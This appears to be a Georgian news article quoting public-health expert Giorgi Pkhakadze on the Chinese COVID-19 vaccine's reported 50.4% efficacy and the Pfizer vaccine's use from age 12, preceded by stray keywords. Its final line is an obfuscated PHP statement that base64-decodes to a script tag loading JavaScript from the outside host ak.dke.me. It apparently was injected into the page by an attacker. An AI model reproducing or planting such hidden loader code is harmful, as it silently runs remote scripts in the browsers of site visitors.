celsiusi
ავერსი საქკაბელი
გაეროს გენერალური მდივნის მრჩეველი, საზოგადოებრივი ჯანდაცვის დამოუკიდებელი ექსპერტი, პროფესორი გიორგი ფხაკაძე ამბობს, რომ  საბოლოო ჯამში ჩინეთმა აღიარა, რომ მათი ვაქცინა არ არის ეფექტური.
 
“მათივე აღიარებით, ამ ვაქცინის ეფექტურობა მაქსიმუმ 50, 4 %-ია.  შედარებისათვის - ფაიზერის ეფექტურობა 94%-ია. 
აქამდეც მქონდა ეს ინფორმაცია, მაგრამ მისი გაჟღავნების უფლება არ მქონდა. ახლა უკვე საჯაროა და გატყობინებთ. ისე, როცა რაიმეზე ირიბად გაფრთხილებთ, კარგი იქნება, რომ ქვეტექსტებს ყურადღება მიაქციოთ და გაითვალისწინოთ.”- განაცხადა ფხაკაძემ.
 
მისივე  თქმით, უკვე ექსპერიმენტებს ატარებენ, რომ შეიძლება, ჩინური ვაქცინის 2 დოზა არ იყოს საკმარისი და მესამეც იყოს გასაკეთებელი. 
 
“ზოგი ჩინელი მეცნიერი კი , იმასაც ამბობს, რომ პირველი დოზა ჩინური ვაქცინის გაკეთების შემდეგ მეორე დოზად ასტრაზენეკა უნდა გაკეთდეს, წარმოგიდგენიათ ხომ რადომხალია?! შეგახსენებთ, საქართველოში ჩინური ვაქცინები უკვე ჩამოსულია, ზოგი გვაჩუქეს და ზოგი ვიყიდეთ... რას ვიზამთ.... ფულის შოვნა ისეთი რამეა ჩვენს ქვეყანაში, რომ ყველა აკეთებს, როგორც შეუძლია...
ისე, ამ კონტექსტში ზოგიერთების გასაგონად - სანამ რაღაცას გააკეთებთ, ერთი-ორი დღით ადრე სტრატეგიულად რომ გადახედოთ პერსპექტივაში მოსალოდნელ შედეგს, არ იქნებოდა ცუდი. ყველაფერს რომ აკეთებთ ჩქარა-ჩქარა თემების დალაგებით და ისე, რომ მაქსიმალურად მოტეხოთ ფული... ხომ იცით, რომ გადაწყვეტილება, რაც იქნა მიღებული, იყო არასწორი გადაწყვეტილება... პიროვნულად არავის ვერჩი, მაგრამ სიმართლე უნდა ითქვას.”- განაცხადა გიორგი ფხაკაძემ. 
 
მან ასევე ისაუბრა ,ფაიზერის ვაქცინაზე და აღნიშნა, რომ უკვე წამოვიდა კვლევები, რომ მისი გამოყენება 12 წლის აასკიდან შეიძლება და კომპანიამ ამერიკის წამლის სააგენტოში გამოყენების ნებართვასთან დაკავშირებით განაცხადი უკვე შეიტანა.
 
 
 
3319
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");